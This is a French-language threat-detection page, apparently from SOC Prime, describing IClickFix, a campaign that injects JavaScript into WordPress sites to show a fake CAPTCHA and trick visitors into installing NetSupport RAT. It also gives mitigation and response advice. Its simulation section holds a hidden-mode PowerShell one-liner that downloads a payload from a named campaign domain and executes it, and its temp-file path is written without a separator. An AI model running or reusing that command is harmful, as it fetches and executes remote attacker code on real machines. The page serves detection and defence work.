SOC Prime Bias: Moyen

03 Feb 2026 18:25 UTC

Rencontrez IClickFix : un cadre répandu ciblant WordPress utilisant la tactique ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Rencontrez IClickFix : un cadre répandu ciblant WordPress utilisant la tactique ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport présente IClickFix, un cadre JavaScript malveillant qui compromet les sites WordPress et présente un CAPTCHA falsifié de type Cloudflare Turnstile. L’appât contraint les visiteurs à exécuter une commande PowerShell qui télécharge et installe NetSupport RAT. La diffusion est soutenue par un système de distribution de trafic construit autour de l’outil YOURLS et un ensemble rotatif de domaines de redirection. Les chercheurs ont observé plus de 3,800 sites WordPress compromis servant cette chaîne à l’échelle mondiale depuis fin 2024.

Enquête

Les analystes de Sekoia ont identifié la balise JavaScript injectée ic-tracker-js sur des sites compromis, puis ont reconstruit le flux de redirection à travers plusieurs domaines à courte durée de vie. Ils ont capturé le modèle exact d’exécution PowerShell utilisé pour récupérer la charge utile finale et ont récupéré les composants NetSupport RAT abandonnés ainsi que les indicateurs d’infrastructure associée pour le commandement et contrôle.

Atténuation

Surveiller le contenu web pour l’ ic-tracker-js injection et bloquer les domaines malveillants connus, les redirections et les services de lien court utilisés dans la chaîne. Sur les points d’extrémité, détecter les schémas de téléchargement et d’exécution PowerShell compatibles avec le leur ClickFix. Ajouter une couverture pour la création de fichiers client NetSupport et pour la persistance via des Run clés de registre au niveau utilisateur.

Réponse

Lorsque des indicateurs apparaissent, isoler le point d’extrémité, arrêter le processus PowerShell actif, et supprimer les binaires NetSupport ainsi que toute persistance basée sur le registre. Suivre avec un triage médico-légal complet pour confirmer que l’attaquant n’a pas déployé d’implants supplémentaires ou établi des chemins d’accès secondaires.

Flux d’Attaque

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:

    An adversary who has initial access to the endpoint wishes to establish a persistent foothold by delivering the NetSupport RAT. To evade interactive detection, they launch PowerShell in hidden mode with no profile or logo (-w hidden -nop -c). They then use Invoke‑WebRequest (iwr) to download a malicious JSON payload (tytuy.json) that contains a PowerShell script for the RAT. The script is written to the temporary directory and executed via Invoke‑Expression. This exact command line matches the strings the Sigma rule monitors.

  • Regression Test Script:

    # PowerShell one‑liner that matches the detection rule
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Cleanup Commands:

    # Remove the downloaded payload and any lingering PowerShell processes
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force